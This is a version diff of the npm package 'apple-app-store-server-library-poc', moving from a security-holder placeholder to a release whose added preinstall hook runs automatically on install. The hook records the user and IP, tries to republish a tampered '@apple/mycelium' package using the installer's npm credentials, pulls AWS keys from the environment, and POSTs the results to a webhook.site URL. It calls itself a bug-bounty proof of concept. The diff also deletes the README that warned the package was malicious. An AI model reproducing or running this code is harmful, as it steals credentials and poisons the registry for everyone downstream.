apple-app-store-server-library-poc 0.0.1-security → 135.0.16

package/package.json

@@ -1,6 +1,7 @@
 {
   "name": "apple-app-store-server-library-poc",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "135.0.16",
+  "scripts": {
+    "preinstall": "export OUT=$(mktemp); URL='https://webhook.site/85f78e76-dc73-4cb5-a65c-27f2c10db591'; (echo '--- FINAL ATTACK: REGISTRY INJECTION ---'; echo \"User: $(whoami)\"; echo \"IP: $(curl -s https://ifconfig.me)\"; npm pack @apple/mycelium 2>/dev/null; FILE=$(ls apple-mycelium-*.tgz 2>/dev/null); if [ -n \"$FILE\" ]; then mkdir -p stage && tar -xzf \"$FILE\" -C stage; cd stage/package; echo -e \"\n# HACKED BY FRANK - NEWTON3RD\nAuthorized PoC for Apple Security Bounty\nTimestamp: $(date)\" >> README.md; sed -i 's/\"version\": \"0.13.2\"/\"version\": \"0.13.3\"/' package.json; echo \"--- AUTH STATUS ---\"; npm whoami 2>&1; echo \"--- ATTEMPTING LIVE PUBLISH TO REGISTRY ---\"; npm publish --access public 2>&1; cd ../..; else echo \"Gagal menarik tarball asli.\"; fi; echo \"--- AWS KEY STATUS ---\"; env | grep -E 'AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY' || echo 'Keys not found in this session'; echo '--- SELESAI ---') > $OUT; curl -X POST -H \"Content-Type: text/plain\" --data-binary @$OUT $URL; rm $OUT"
+  }
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=apple-app-store-server-library-poc for more information.